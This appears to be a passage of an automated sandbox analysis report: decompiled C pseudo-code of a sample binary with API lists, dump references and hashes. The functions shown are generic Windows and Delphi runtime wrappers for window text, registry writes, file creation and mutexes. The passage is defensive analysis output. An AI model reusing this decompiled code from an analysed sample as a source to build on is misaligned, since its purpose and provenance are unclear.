                                                                                                                                                                                                                            					E00404DCC(_v8, _t37);
                                                                                                                                                                                                                            					if(_t41 != 0 ||  *((intOrPtr*)(_t27 + 0x8c)) != 0) {
                                                                                                                                                                                                                            						SetWindowTextA( *(_t27 + 0x30), E00404E80(_t37));
                                                                                                                                                                                                                            						_t6 = _t27 + 0x8c; // 0x8c
                                                                                                                                                                                                                            						E004049C0(_t6);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t33);
                                                                                                                                                                                                                            				 *[fs:eax] = _t33;
                                                                                                                                                                                                                            				_push(E0045A315);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            0x0045a2fa
                                                                                                                                                                                                                            0x0045a2fd
                                                                                                                                                                                                                            0x0045a300
                                                                                                                                                                                                                            0x0045a30d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0045A240: GetWindowTextA.USER32 ref: 0045A263
                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 0045A2D9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: TextWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 530164218-0
                                                                                                                                                                                                                            • Opcode ID: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                                                                                                                                                                                            • Instruction ID: 29e0112d14c0054e859a686d8a752fc0bc116d16f21071392ac3c9ea7363cd22
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41182df715c6d1993ac9e56a2f72632cfa14d16efb69e0a200bee66e53859129
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E001D4B06006049BD701EB65C842B5A72A8AB88704F5042B7FD0497383D63C9D59866E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407A8C(long __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
                                                                                                                                                                                                                            				CHAR* _v8;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                            				CHAR* _t29;
                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = _t29;
                                                                                                                                                                                                                            				_t32 = __eax;
                                                                                                                                                                                                                            				_t13 = E00402C0C();
                                                                                                                                                                                                                            				_t24 = CreateWindowExA(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                                                                                                                                                            				E00402BFC(_t13);
                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                                            • Opcode ID: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                                                                                                                                                                                            • Instruction ID: 8ac853332085b9bd21b4b606e16f655482de0c328e5100a7f3fe009a2cef9f92
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f03bbe19ce8bec98a003051f3de9d9a43124493f49fa58d3969b4d3575b5c8e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDF092B2704158BF9B80DE9DDD85EDB77ECEB4C264B05416AFA0CE3241D674ED108BA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00407AE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                            				struct HWND__* _t22;
                                                                                                                                                                                                                            				long _t27;
                                                                                                                                                                                                                            				CHAR* _t30;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = _t27;
                                                                                                                                                                                                                            				_t30 = __eax;
                                                                                                                                                                                                                            				_t12 = E00402C0C();
                                                                                                                                                                                                                            				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                                                                                                                                                                            				E00402BFC(_t12);
                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                                            • Opcode ID: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                                                            • Instruction ID: 82a16aa5288589ed1fecfa95a929c264de13a72832aac3a4e9138b950186d13c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d9c814ae894669e17ea23ad296cc65551029b32c6dd679f2156c17a54264ffd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F092B2704158BFDB80DE9EDD85E9B77ECEB4C264B00416ABA0CD7241D574ED108BA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00432310(void* __eax, char* __ecx, char __edx, void* __eflags, intOrPtr _a4, int _a8) {
                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				int _t11;
                                                                                                                                                                                                                            				long _t17;
                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                            				char _t26;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                            				_t26 = __edx;
                                                                                                                                                                                                                            				_t21 = __eax;
                                                                                                                                                                                                                            				_t11 = E00431D9C(_a4);
                                                                                                                                                                                                                            				_t27 = _t11;
                                                                                                                                                                                                                            				_t17 = RegSetValueExA( *(_t21 + 4), E00404E80(__edx), 0, _t11, _v8, _a8); // executed
                                                                                                                                                                                                                            				if(_t17 != 0) {
                                                                                                                                                                                                                            					_v16 = _t26;
                                                                                                                                                                                                                            					_v12 = 0xb;
                                                                                                                                                                                                                            					_t23 =  *0x49daf4; // 0x417504
                                                                                                                                                                                                                            					_t20 = E0040D23C(_t21, _t23, 1, _t26, _t27, 0,  &_v16);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            					return _t20;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t17;
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00432341
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                                                                                                                                                                                            • Instruction ID: 39d1438e57032ee4bbe9f28f00567530b1aebd0f65b6a02640603f55bb4cbe43
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19274d5597ff4bf67958b91c708d6c228912aaa851d12f25db2d8365e4f6a269
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F0A471A001087BD700EBAEDC81EAFB7EC9B49314F0040BAFA18E7391DA749D0087A4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E0043EAF8(intOrPtr __eax) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				void* __ecx;
                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(_t19);
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				 *(_v8 + 0x54) =  *(_v8 + 0x54) | 0x00000200;
                                                                                                                                                                                                                            				_push(_t27);
                                                                                                                                                                                                                            				_push(0x43eb45);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t27;
                                                                                                                                                                                                                            				_t14 =  *((intOrPtr*)(_v8 + 0x180));
                                                                                                                                                                                                                            				_push(_t14); // executed
                                                                                                                                                                                                                            				L00407568(); // executed
                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                            					E0040E79C(_t18, _t19, _t23, _t24);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t22);
                                                                                                                                                                                                                            				 *[fs:eax] = _t22;
                                                                                                                                                                                                                            				_push(0x43eb4c);
                                                                                                                                                                                                                            				_t16 = _v8;
                                                                                                                                                                                                                            				 *(_t16 + 0x54) =  *(_t16 + 0x54) & 0x0000fdff;
                                                                                                                                                                                                                            				return _t16;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73CA9840.USER32(?,00000000,0043EB45), ref: 0043EB20
                                                                                                                                                                                                                              • Part of subcall function 0040E79C: GetLastError.KERNEL32(00000000,0040E82C), ref: 0040E7B6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: A9840ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3743331550-0
                                                                                                                                                                                                                            • Opcode ID: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                                                                                                                                                                                            • Instruction ID: c963e65f66f93bc950c3b922f0db45755e41eff8f234a4ebd21f449329ecdab1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 162f4c810722b2cf9dba1348c30168551af8e42deea3d9e9740feb706b3eb27c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EF03031615704EFEB16CB6ACA56D59F7E8EB0C710B6204BAF900D7691E638BD10DA18
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00425A84(void* __eax, struct tagSIZE* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                            				int _t9;
                                                                                                                                                                                                                            				int _t13;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				intOrPtr _t17;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t14 = __eax;
                                                                                                                                                                                                                            				_t17 =  *0x425ac4; // 0x3
                                                                                                                                                                                                                            				E00425D3C(__eax, __ecx, _t17);
                                                                                                                                                                                                                            				 *__ecx = 0;
                                                                                                                                                                                                                            				__ecx->cy = 0;
                                                                                                                                                                                                                            				_t9 = E00404C80(__edx);
                                                                                                                                                                                                                            				_t13 = GetTextExtentPoint32A( *(_t14 + 4), E00404E80(__edx), _t9, __ecx); // executed
                                                                                                                                                                                                                            				return _t13;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetTextExtentPoint32A.GDI32(?,00000000,00000000), ref: 00425AB8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExtentPoint32Text
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 223599850-0
                                                                                                                                                                                                                            • Opcode ID: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                                                                                                                                                                                            • Instruction ID: 930b99cdb260b2b8a229d6862ebc98a20fe47073bc0098dbe1fe4fd8dd38ffb9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AE08CB23112102B9350EB7E6C81A6BAAED8FCC225309897FF98CD3342D538DC058368
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00405F94(void* __eax) {
                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				intOrPtr _t19;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t16 = __eax;
                                                                                                                                                                                                                            				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                                                                                                                                                                            					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
                                                                                                                                                                                                                            					_t14 = E004061D0(_t19); // executed
                                                                                                                                                                                                                            					_t18 = _t14;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                                                                                                                                                                            					if(_t18 == 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return  *((intOrPtr*)(_t16 + 0x10));
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
                                                                                                                                                                                                                              • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                                                                                                                                                                                              • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2796650324-0
                                                                                                                                                                                                                            • Opcode ID: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                                                            • Instruction ID: b1b40bdc6994046442ce0d201b14f24feebb016b61ac17d43a71f6c7551704b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29E06D71A003148BCB10DE9889C1A8377E8AB08754F0009B6BC54EF38AD3B8DD208BD4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                            			E00409974(void* __eax, long __ecx, void* __edx) {
                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                            				int _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                            				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
                                                                                                                                                                                                                            				if(_t4 == 0) {
                                                                                                                                                                                                                            					_v16 = 0xffffffff;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _v16;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00409988
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409A58(void* __eax) {
                                                                                                                                                                                                                            				signed char _t5;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t5 = GetFileAttributesA(E00404E80(__eax)); // executed
                                                                                                                                                                                                                            				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00406F8E(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t4 = _a12;
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E00406F90(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t4 = _a12;
                                                                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                                                                            				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMutex
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040991C(void* __eax) {
                                                                                                                                                                                                                            				void* _t4;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t4 = CreateFileA(E00404E80(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                            APIs
